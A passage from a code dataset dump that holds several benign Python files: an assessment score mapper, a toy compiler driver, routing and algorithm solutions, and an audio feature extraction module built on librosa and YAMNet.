opportunity):\n\n claim1_mapping = getClaimMappingName(metadata, PerformanceMetadataConstants.CLAIM1, PerformanceMetadataConstants.CLAIM1) or get_claim1_mapping(opportunity)\n claim2_mapping = getClaimMappingName(metadata, PerformanceMetadataConstants.CLAIM2, PerformanceMetadataConstants.CLAIM2)\n claim3_mapping = getClaimMappingName(metadata, PerformanceMetadataConstants.CLAIM3, PerformanceMetadataConstants.CLAIM3)\n claim4_mapping = getClaimMappingName(metadata, PerformanceMetadataConstants.CLAIM4, PerformanceMetadataConstants.CLAIM4)\n\n if not claim1_mapping:\n raise MetadataException(\"Incorrect claims number of assessment type %s\" % metadata['Identification']['Type'])\n\n overall_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='Overall'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n claim1_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='\" + claim1_mapping + \"'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n claim2_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='\" + claim2_mapping + \"'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n claim3_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='\" + claim3_mapping + \"'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n claim4_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='\" + claim4_mapping + \"'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n\n return [\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='Overall'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='Overall'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentPerformanceLevelIdentifier),\n Mapping(overall_score.get_min(), AssessmentHeaders.AssessmentSubtestMinimumValue),\n Mapping(overall_score.get_max(), AssessmentHeaders.AssessmentSubtestMaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim1_mapping + \"'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreClaim1Value),\n Mapping(claim1_score.get_min(), AssessmentHeaders.AssessmentSubtestClaim1MinimumValue),\n Mapping(claim1_score.get_max(), AssessmentHeaders.AssessmentSubtestClaim1MaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim1_mapping + \"'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentClaim1PerformanceLevelIdentifier),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim2_mapping + \"'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreClaim2Value),\n Mapping(claim2_score.get_min(), AssessmentHeaders.AssessmentSubtestClaim2MinimumValue),\n Mapping(claim2_score.get_max(), AssessmentHeaders.AssessmentSubtestClaim2MaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim2_mapping + \"'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentClaim2PerformanceLevelIdentifier),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim3_mapping + \"'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreClaim3Value),\n Mapping(claim3_score.get_min(), AssessmentHeaders.AssessmentSubtestClaim3MinimumValue),\n Mapping(claim3_score.get_max(), AssessmentHeaders.AssessmentSubtestClaim3MaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim3_mapping + \"'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentClaim3PerformanceLevelIdentifier),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim4_mapping + \"'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreClaim4Value),\n Mapping(claim4_score.get_min(), AssessmentHeaders.AssessmentSubtestClaim4MinimumValue),\n Mapping(claim4_score.get_max(), AssessmentHeaders.AssessmentSubtestClaim4MaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim4_mapping + \"'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentClaim4PerformanceLevelIdentifier)\n ]\n\n\ndef get_claim1_mapping(opportunity):\n # if no claims mapping found, we take the first Overall, this is most lieky IAB\n return 'Overall'\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter_score_batcher/smarter_score_batcher/processing/assessment.py","file_name":"assessment.py","file_ext":"py","file_size_in_byte":26653,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"74226597287","text":"from scanner import Lexer\nfrom my_parser import Parser\nfrom codegen import CodeGen\n\nif __name__ == '__main__':\n file_name = \"input.nullr\"\n with open(file_name) as file:\n input_code = file.read()\n\n lexer = Lexer().get_lexer()\n tokens = lexer.lex(input_code)\n\n codegen = CodeGen()\n module = codegen.module\n builder = codegen.builder\n printf = codegen.print\n\n parser_generator = Parser(module, builder, printf)\n parser_generator.parse()\n parser = parser_generator.get_parser()\n parser.parse(tokens).eval()\n\n codegen.create_ir()\n codegen.save_ir(\"IrFile.ll\")\n","repo_name":"benymaxparsa/Compiler-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24560930650","text":"#This script solves the task that Ron showed me in a greedy manner or as a baseline in random moves.\n#Still I believe the more complex \"dynamic programming\" method, which solves such problems optimal is superior.\n#For this variant we need a recursive approach.\nfrom pathlib import Path\nfrom helper import Node, Transporter, generate_links_from_txt, generate_txt_from_transitions\n\nif __name__ == \"__main__\":\n print(\"Start script\")\n #prerequisites\n #positions of the nodes with names\n #x,y,name\n nodes = [(5, 10, 1), (50, 5, 2), (40, 20, 3), (60, 35, 4), (30, 35, 5), (20, 30, 6)]\n #path to the transport demand and result path\n path_to_demand = Path(Path.joinpath(Path(__file__).parent), \"data/transport_demand.txt\")\n path_to_result = Path(Path.joinpath(Path(__file__).parent), \"data\")\n #generate a dict with each node and it links\n print(\"Generate the node link map\")\n node_dict: dict[int, Node] = generate_links_from_txt(nodes, path_to_demand)\n\n\n #----------------solving-----------------------\n print(\"Init the algo\")\n #keep track of the visit nodes\n history = []\n #methode\n methode = \"greedy\"\n #methode = \"random\"\n #number of transporter up to 6 possible\n number_of_transporter = 5\n #stores the transporter\n transporter_list:list[Transporter] = []\n #tracks the costs\n overall_costs = 0\n #flag to show transition\n show_transition = False\n\n #spawn transporter\n for id in range(1,number_of_transporter+1):\n transporter_list.append(Transporter(id, node_dict[id], False))\n\n print(f\"Start moving the transporter in a {methode} manner\")\n #let each transporter drive till there are no more links to work on\n while(1):\n for transporter in transporter_list:\n #transporter does a move\n node_dict, transition, step_cost = transporter.evaluate_step(node_dict, methode)\n overall_costs += step_cost\n #if transition is none there are no more links left\n if transition is None:\n break\n else:\n if show_transition:\n print(transition)\n history.append(transition)\n if transition is None:\n break\n\n print(\"No more links are left to work on\")\n print(f\"\"\"The \"{methode}\" methode with {number_of_transporter} transporter terminated with costs of: {round(overall_costs, 4)}\"\"\")\n print(\"Export the transitions as txt\")\n generate_txt_from_transitions(history, path_to_result, f\"num_trans_{number_of_transporter}_methode_{methode}\")\n print(\"End script\")\n","repo_name":"seidellu/rons_task","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31624970178","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nn = int(input())\np = list(map(int,input().split()))\np_ind = [ (p[i], i+1) for i in range(n) ]\np_ind.sort(reverse=True)\n\n# 平方分割します。\nmax_n = 10**5\ndiv_n = int(max_n**(1/2))+1\na = [[] for _ in range(div_n)]\na[0] = [0,0]\na[(n+1)//div_n].append(n+1)\na[(n+1)//div_n].append(n+1)\na_count = [0] * (div_n)\na_count[0] += 2\na_count[(n+1)//div_n] += 2\n\nimport bisect\nans = 0\nfor tmp in p_ind:\n val, i = tmp\n group = i//div_n\n j = bisect.bisect(a[group],i)\n #left\n if(j>1):\n left1 = a[group][j-1]\n left2 = a[group][j-2]\n elif(j==1):\n left1 = a[group][j-1]\n lg = group-1\n while(True):\n if(a_count[lg]>0):\n break\n lg -=1\n left2 = a[lg][-1]\n else:\n lg = group-1\n while(True):\n if(a_count[lg]>0):\n break\n lg -=1\n if(a_count[lg]>=2):\n left1 = a[lg][-1]\n left2 = a[lg][-2]\n else:\n left1 = a[lg][-1]\n while(True):\n lg -=1\n if(a_count[lg]>0):\n break\n left2 = a[lg][-1]\n #right\n if(a_count[group]>=j+2):\n right1 = a[group][j]\n right2 = a[group][j+1]\n elif(a_count[group]>=j+1):\n right1 = a[group][j]\n rg = group\n while(True):\n rg += 1\n if(a_count[rg]>0):\n break\n right2 = a[rg][0]\n else:\n rg = group\n while(True):\n rg += 1\n if(a_count[rg]>0):\n break\n if(a_count[rg]>=2):\n right1 = a[rg][0]\n right2 = a[rg][1]\n else:\n right1 = a[rg][0]\n while(True):\n rg += 1\n if(a_count[rg]>0):\n break\n right2 = a[rg][0]\n\n ans += ((right2 - right1)* (i - left1) + (right1 - i)* (left1 - left2)) * val\n a[group].insert(j,i)\n a_count[group] += 1\n\nprint(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc140_old/e3.py","file_name":"e3.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38131829969","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n def findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n post = {i: [] for i in range(numCourses)}\n visit = [0 for _ in range(numCourses)]\n for i, j in prerequisites:\n post[j].append(i)\n\n ans = []\n self.ispossible = True\n\n def dfs(node):\n if not self.ispossible:\n return\n visit[node] = 1\n for i in post[node]:\n if visit[i] == 0:\n dfs(i)\n if visit[i] == 1:\n self.ispossible = False\n visit[node] = 2\n ans.append(node)\n\n for i in post:\n if visit[i] == 0:\n dfs(i)\n\n return ans[::-1] if self.ispossible else []\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n numCourses = 6\n prerequisites = [[0,1],[2,0],[0,3],[1,2],[1,3],[2,4],[2,5]]\n numCourses = 2\n prerequisites = [[1, 0]]\n numCourses = 4\n prerequisites = [[1, 0], [2, 0], [3, 1], [3, 2]]\n print(sol.findOrder(numCourses, prerequisites))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc201-300/lc210/CourseScheduleII.py","file_name":"CourseScheduleII.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27986989974","text":"''' Extractors that operate on AudioStim inputs. '''\n\nfrom abc import ABCMeta\nfrom os import path\nimport sys\nimport logging\n\nimport numpy as np\nfrom scipy import fft\nimport pandas as pd\n\nfrom pliers.stimuli.audio import AudioStim\nfrom pliers.stimuli.text import ComplexTextStim\nfrom pliers.extractors.base import Extractor, ExtractorResult\nfrom pliers.utils import attempt_to_import, verify_dependencies, listify\nfrom pliers.support.exceptions import MissingDependencyError\nfrom pliers.support.setup_yamnet import YAMNET_PATH\n\nlibrosa = attempt_to_import('librosa')\ntf = attempt_to_import('tensorflow')\n\n\nclass AudioExtractor(Extractor):\n\n ''' Base Audio Extractor class; all subclasses can only be applied to\n audio. '''\n _input_type = AudioStim\n\n\nclass STFTAudioExtractor(AudioExtractor):\n\n ''' Short-time Fourier Transform extractor.\n\n Args:\n frame_size (float): The width of the frame/window to apply an FFT to,\n in seconds.\n hop_size (float): The step size to increment the window by on each\n iteration, in seconds (effectively, the sampling rate).\n freq_bins (list or int): The set of bins or frequency bands to extract\n power for. If an int is passed, this is the number of bins\n returned, with each bin spanning an equal range of frequencies.\n E.g., if bins=5 and the frequency spectrum runs from 0 to 20KHz,\n each bin will span 4KHz. If a list is passed, each element must be\n a tuple or list of lower and upper frequency bounds. E.g., passing\n [(0, 300), (300, 3000)] would compute power in two bands, one\n between 0 and 300Hz, and one between 300Hz and 3KHz.\n spectrogram (bool): If True, plots a spectrogram of the results.\n\n Notes: code adapted from\n http://stackoverflow.com/questions/2459295/invertible-stft-and-istft-in-python\n '''\n\n _log_attributes = ('frame_size', 'hop_size', 'freq_bins')\n VERSION = '1.0'\n\n def __init__(self, frame_size=0.5, hop_size=0.1, freq_bins=5,\n spectrogram=False):\n self.frame_size = frame_size\n self.hop_size = hop_size\n self.spectrogram = spectrogram\n self.freq_bins = freq_bins\n super().__init__()\n\n def _stft(self, stim):\n x = stim.data\n framesamp = int(self.frame_size * stim.sampling_rate)\n hopsamp = int(self.hop_size * stim.sampling_rate)\n w = np.hanning(framesamp)\n X = np.array([fft.fft(w * x[i:(i + framesamp)])\n for i in range(0, len(x) - framesamp, hopsamp)])\n nyquist_lim = int(X.shape[1] // 2)\n X = np.log(X[:, :nyquist_lim])\n X = np.absolute(X)\n if self.spectrogram:\n import matplotlib.pyplot as plt\n bins = np.fft.fftfreq(framesamp, d=1. / stim.sampling_rate)\n bins = bins[:nyquist_lim]\n plt.imshow(X.T, origin='lower', aspect='auto',\n interpolation='nearest', cmap='RdYlBu_r',\n extent=[0, stim.duration, bins.min(), bins.max()])\n plt.xlabel('Time')\n plt.ylabel('Frequency')\n plt.colorbar()\n plt.show()\n return X\n\n def _extract(self, stim):\n data = self._stft(stim)\n time_bins = np.arange(0., stim.duration - self.frame_size,\n self.hop_size)\n\n if isinstance(self.freq_bins, int):\n bins = []\n bin_size = int(data.shape[1] / self.freq_bins)\n for i in range(self.freq_bins):\n if i == self.freq_bins - 1:\n bins.append((i * bin_size, data.shape[1]))\n else:\n bins.append((i * bin_size, (i + 1) * bin_size))\n self.freq_bins = bins\n\n features = ['%d_%d' % fb for fb in self.freq_bins]\n offset = 0.0 if stim.onset is None else stim.onset\n index = [tb + offset for tb in time_bins]\n values = np.zeros((len(index), len(features)))\n for i, fb in enumerate(self.freq_bins):\n start, stop = fb\n values[:, i] = data[:, start:stop].mean(1)\n values[np.isnan(values)] = 0.\n values[np.isinf(values)] = 0.\n return ExtractorResult(values, stim, self, features=features,\n onsets=index, durations=self.hop_size,\n orders=list(range(len(index))))\n\n\nclass MeanAmplitudeExtractor(Extractor):\n\n ''' Mean amplitude extractor for blocks of audio with transcription. '''\n\n _input_type = (AudioStim, ComplexTextStim)\n\n def _extract(self, stim):\n\n amps = stim.audio.data\n sampling_rate = stim.audio.sampling_rate\n elements = stim.complex_text.elements\n values, onsets, durations = [], [], []\n\n for i, el in enumerate(elements):\n onset = sampling_rate * el.onset\n onsets.append(onset)\n duration = sampling_rate * el.duration\n durations.append(duration)\n\n r_onset = np.round(onset).astype(int)\n r_offset = np.round(onset + duration).astype(int)\n if not r_offset <= amps.shape[0]:\n raise Exception('Block ends after data.')\n\n mean_amplitude = np.mean(amps[r_onset:r_offset])\n values.append(mean_amplitude)\n\n orders = list(range(len(elements)))\n\n return ExtractorResult(values, stim, self, features=['mean_amplitude'],\n onsets=onsets, durations=durations,\n orders=orders)\n\n\nclass LibrosaFeatureExtractor(AudioExtractor, metaclass=ABCMeta):\n\n ''' A generic class for audio extractors using the librosa library. '''\n\n _log_attributes = ('hop_length', 'librosa_kwargs')\n\n def __init__(self, feature=None, hop_length=512, **librosa_kwargs):\n verify_dependencies(['librosa'])\n if feature:\n self._feature = feature\n self.hop_length = hop_length\n self.librosa_kwargs = librosa_kwargs\n super().__init__()\n\n def get_feature_names(self):\n return self._feature\n\n def _get_values(self, stim):\n if self._feature in ['zero_crossing_rate', 'rms', 'spectral_flatness']:\n return getattr(librosa.feature, self._feature)(\n y=stim.data, hop_length=self.hop_length, **self.librosa_kwargs)\n elif self._feature == 'tonnetz':\n return getattr(librosa.feature, self._feature)(\n y=stim.data, sr=stim.sampling_rate, **self.librosa_kwargs)\n\n elif self._feature in ['onset_detect', 'onset_strength_multi']:\n return getattr(librosa.onset, self._feature)(\n y=stim.data, sr=stim.sampling_rate, hop_length=self.hop_length,\n **self.librosa_kwargs)\n\n elif self._feature in ['tempo', 'beat_track']:\n return getattr(librosa.beat, self._feature)(\n y=stim.data, sr=stim.sampling_rate, hop_length=self.hop_length,\n **self.librosa_kwargs)\n\n elif self._feature in ['harmonic', 'percussive']:\n return getattr(librosa.effects, self._feature)(\n y=stim.data,\n **self.librosa_kwargs)\n elif self._feature == 'yin':\n return getattr(librosa, self._feature)(\n y=stim.data, sr=stim.sampling_rate, hop_length=self.hop_length,\n **self.librosa_kwargs)\n else:\n return getattr(librosa.feature, self._feature)(\n y=stim.data, sr=stim.sampling_rate, hop_length=self.hop_length,\n **self.librosa_kwargs)\n\n def _extract(self, stim):\n\n values = self._get_values(stim)\n\n if self._feature=='beat_track':\n beats=np.array(values[1])\n values=beats\n\n values = values.T\n n_frames = len(values)\n\n feature_names = listify(self.get_feature_names())\n\n onsets = librosa.frames_to_time(range(n_frames),\n sr=stim.sampling_rate,\n hop_length=self.hop_length)\n\n onsets = onsets + stim.onset if stim.onset else onsets\n\n durations = [self.hop_length / float(stim.sampling_rate)] * n_frames\n\n return ExtractorResult(values, stim, self, features=feature_names,\n onsets=onsets, durations=durations,\n orders=list(range(n_frames)))\n\n\nclass SpectralCentroidExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the spectral centroids from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_centroid.html.'''\n\n _feature = 'spectral_centroid'\n\n\nclass SpectralBandwidthExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the p'th-order spectral bandwidth from audio using the\n Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_bandwidth.html.'''\n\n _feature = 'spectral_bandwidth'\n\n\nclass SpectralFlatnessExtractor(LibrosaFeatureExtractor):\n\n ''' Computes the spectral flatness from audio using the\n Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_flatness.html.'''\n\n _feature = 'spectral_flatness'\n\n\nclass SpectralContrastExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the spectral contrast from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_contrast.html.'''\n\n _feature = 'spectral_contrast'\n\n def __init__(self, n_bands=6, **kwargs):\n self.n_bands = n_bands\n super().__init__(\n n_bands=n_bands, **kwargs)\n\n def get_feature_names(self):\n abc= ['spectral_contrast_band_%d' % i\n for i in range(self.n_bands + 1)]\n return abc\n\n\nclass SpectralRolloffExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the roll-off frequency from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_rolloff.html.'''\n\n _feature = 'spectral_rolloff'\n\n\nclass PolyFeaturesExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the coefficients of fitting an nth-order polynomial to the columns of an audio's spectrogram (via Librosa).\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.poly_features.html.'''\n\n _feature = 'poly_features'\n\n def __init__(self, order=1, **kwargs):\n self.order = order\n super().__init__(order=order, **kwargs)\n\n def get_feature_names(self):\n return ['coefficient_%d' % i for i in range(self.order + 1)]\n\n\nclass RMSExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts root mean square (RMS) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.rms.html.'''\n\n _feature = 'rms'\n\n\nclass OnsetDetectExtractor(LibrosaFeatureExtractor):\n\n ''' Detects the basic onset (onset_detect) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.onset.onset_detect.html.'''\n\n _feature = 'onset_detect'\n\n\nclass TempoExtractor(LibrosaFeatureExtractor):\n\n ''' Detects the tempo (tempo) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.beat.tempo.html.'''\n\n _feature = 'tempo'\n\n\nclass BeatTrackExtractor(LibrosaFeatureExtractor):\n\n ''' Dynamic programming beat tracker (beat_track) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.beat.beat_track.html.'''\n\n _feature = 'beat_track'\n\n\nclass OnsetStrengthMultiExtractor(LibrosaFeatureExtractor):\n\n '''Computes the spectral flux onset strength envelope across multiple channels (onset_strength_multi) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.onset.onset_strength_multi.html.'''\n\n _feature = 'onset_strength_multi'\n\n\nclass ZeroCrossingRateExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the zero-crossing rate of audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.zero_crossing_rate.html.'''\n\n _feature = 'zero_crossing_rate'\n\n\nclass ChromaSTFTExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts a chromagram from an audio's waveform using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.chroma_stft.html.'''\n\n _feature = 'chroma_stft'\n\n def __init__(self, n_chroma=12, **kwargs):\n self.n_chroma = n_chroma\n super().__init__(n_chroma=n_chroma, **kwargs)\n\n def get_feature_names(self):\n return ['chroma_%d' % i for i in range(self.n_chroma)]\n\n\nclass ChromaCQTExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts a constant-q chromogram from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.chroma_cqt.html.'''\n\n _feature = 'chroma_cqt'\n\n def __init__(self, n_chroma=12, **kwargs):\n self.n_chroma = n_chroma\n super().__init__(n_chroma=n_chroma, **kwargs)\n\n def get_feature_names(self):\n return ['chroma_cqt_%d' % i for i in range(self.n_chroma)]\n\n\nclass ChromaCENSExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts a chroma variant \"Chroma Energy Normalized\" (CENS)\n chromogram from audio (via Librosa).\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.chroma_cens.html.'''\n\n _feature = 'chroma_cens'\n\n def __init__(self, n_chroma=12, **kwargs):\n self.n_chroma = n_chroma\n super().__init__(n_chroma=n_chroma, **kwargs)\n\n def get_feature_names(self):\n return ['chroma_cens_%d' % i for i in range(self.n_chroma)]\n\n\nclass MelspectrogramExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts mel-scaled spectrogram from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.melspectrogram.html.'''\n\n _feature = 'melspectrogram'\n\n def __init__(self, n_mels=128, **kwargs):\n self.n_mels = n_mels\n super().__init__(n_mels=n_mels, **kwargs)\n\n def get_feature_names(self):\n return ['mel_%d' % i for i in range(self.n_mels)]\n\n\nclass MFCCExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts Mel Frequency Ceptral Coefficients from audio using the\n Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.mfcc.html.'''\n\n _feature = 'mfcc'\n\n def __init__(self, n_mfcc=20, **kwargs):\n self.n_mfcc = n_mfcc\n super().__init__(n_mfcc=n_mfcc, **kwargs)\n\n def get_feature_names(self):\n return ['mfcc_%d' % i for i in range(self.n_mfcc)]\n\n\nclass TonnetzExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the tonal centroids (tonnetz) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.tonnetz.html.'''\n\n _feature = 'tonnetz'\n\n def get_feature_names(self):\n return ['tonal_centroid_%d' % i for i in range(6)]\n\n\nclass TempogramExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts a tempogram from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.tempogram.html.'''\n\n _feature = 'tempogram'\n\n def __init__(self, win_length=384, **kwargs):\n self.win_length = win_length\n super().__init__(win_length=win_length,\n **kwargs)\n\n def get_feature_names(self):\n return ['tempo_%d' % i for i in range(self.win_length)]\n\n\nclass HarmonicExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the harmonic elements from an audio time-series using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.effects.harmonic.html.'''\n\n _feature = 'harmonic'\n\n\nclass PercussiveExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the percussive elements from an audio time-series using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.effects.percussive.html.'''\n\n _feature = 'percussive'\n\n\nclass FundamentalFrequencyExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the fundamental frequency using the YIN algorithm as\n implemented in the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.yin.html.'''\n\n _feature = 'yin'\n\n def __init__(self, fmin=65, fmax=2093, **kwargs):\n self.fmin = fmin\n self.fmax = fmax\n super().__init__(fmin=fmin, fmax=fmax, **kwargs)\n\n\nclass AudiosetLabelExtractor(AudioExtractor):\n\n ''' Extract probability of 521 audio event classes based on AudioSet\n corpus using a YAMNet architecture. Code available at:\n https://github.com/tensorflow/models/tree/master/research/audioset/yamnet\n\n Args:\n hop_size (float): size of the audio segment (in seconds) on which label\n extraction is performed.\n top_n (int): specifies how many of the highest label probabilities are\n returned. If None, all labels (or those passed to the labels \n argument) are returned. Top_n and labels are mutually \n exclusive.\n labels (list): specifies subset of labels for which probabilities\n are to be returned. If None, all labels (or top_n) are returned.\n The full list of labels is available in the audioset/yamnet\n repository (see yamnet_class_map.csv).\n weights_path (optional): full path to model weights file. If not provided,\n weights from pretrained YAMNet module are used.\n yamnet_kwargs (optional): Optional named arguments that modify input\n parameters for the model (see params.py file in yamnet repository)\n '''\n\n _log_attributes = ('hop_size', 'top_n', 'labels', 'weights_path',\n 'yamnet_kwargs')\n\n def __init__(self, hop_size=0.1, top_n=None, labels=None,\n weights_path=None, **yamnet_kwargs):\n verify_dependencies(['tensorflow'])\n try:\n sys.path.insert(0, str(YAMNET_PATH))\n self.yamnet = attempt_to_import('yamnet')\n verify_dependencies(['yamnet'])\n except MissingDependencyError:\n msg = ('Yamnet could not be imported. To download and set up '\n 'yamnet, run:\\n\\tpython -m pliers.support.setup_yamnet')\n raise MissingDependencyError(dependencies=None,\n custom_message=msg)\n if top_n and labels:\n raise ValueError('Top_n and labels are mutually exclusive '\n 'arguments. Reinstantiate the extractor setting '\n 'top_n or labels to None (or leaving it '\n 'unspecified).')\n\n MODULE_PATH = path.dirname(self.yamnet.__file__)\n LABELS_PATH = path.join(MODULE_PATH, 'yamnet_class_map.csv')\n self.weights_path = weights_path or path.join(MODULE_PATH, 'yamnet.h5')\n self.hop_size = hop_size\n self.yamnet_kwargs = yamnet_kwargs or {}\n self.params = self.yamnet.params\n self.params.PATCH_HOP_SECONDS = hop_size\n for par, v in self.yamnet_kwargs.items():\n setattr(self.params, par, v)\n if self.params.PATCH_WINDOW_SECONDS != 0.96:\n logging.warning('Custom values for PATCH_WINDOW_SECONDS were '\n 'passed. YAMNet was trained on windows of 0.96s. Different '\n 'values might yield unreliable results.')\n\n self.top_n = top_n\n all_labels = pd.read_csv(LABELS_PATH)['display_name'].tolist()\n if labels is not None:\n missing = list(set(labels) - set(all_labels))\n labels = list(set(labels) & set(all_labels))\n if missing:\n logging.warning(f'Labels {missing} do not exist. Dropping.')\n self.label_idx, self.labels = zip(*[(i,l)\n for i,l in enumerate(all_labels)\n if l in labels])\n else:\n self.labels = all_labels\n self.label_idx = list(range(len(all_labels)))\n super().__init__()\n\n def _extract(self, stim):\n self.params.SAMPLE_RATE = stim.sampling_rate\n\n if self.params.SAMPLE_RATE >= 2 * self.params.MEL_MAX_HZ:\n if self.params.SAMPLE_RATE != 16000:\n logging.warning(\n 'The sampling rate of the stimulus is '\n f'{self.params.SAMPLE_RATE}Hz. YAMNet was trained on '\n ' audio sampled at 16000Hz. This should not impact '\n 'predictions, but you can resample the input using '\n 'AudioResamplingFilter for full conformity '\n 'to training.')\n if self.params.MEL_MIN_HZ != 125 or self.params.MEL_MAX_HZ != 7500:\n logging.warning(\n 'Custom values for MEL_MIN_HZ and MEL_MAX_HZ '\n 'were passed. Changing these defaults might affect '\n 'model performance.')\n else:\n raise ValueError(\n 'The sampling rate of your stimulus '\n f'({self.params.SAMPLE_RATE}Hz) must be at least twice the '\n f'value of MEL_MAX_HZ ({self.params.MEL_MAX_HZ}Hz). Upsample'\n ' your audio stimulus (recommended) or pass a lower value of '\n 'MEL_MAX_HZ when initializing the extractor.')\n\n model = self.yamnet.yamnet_frames_model(self.params)\n model.load_weights(self.weights_path)\n preds, _ = model.predict_on_batch(np.reshape(stim.data, [1,-1]))\n preds = preds[:,self.label_idx]\n\n nr_lab = self.top_n or len(self.labels)\n idx = np.mean(preds,axis=0).argsort()\n preds = np.fliplr(preds[:,idx][:,-nr_lab:])\n labels = [self.labels[i] for i in idx][-nr_lab:][::-1]\n\n hop = self.params.PATCH_HOP_SECONDS\n window = self.params.PATCH_WINDOW_SECONDS\n stft_window = self.params.STFT_WINDOW_SECONDS\n stft_hop = 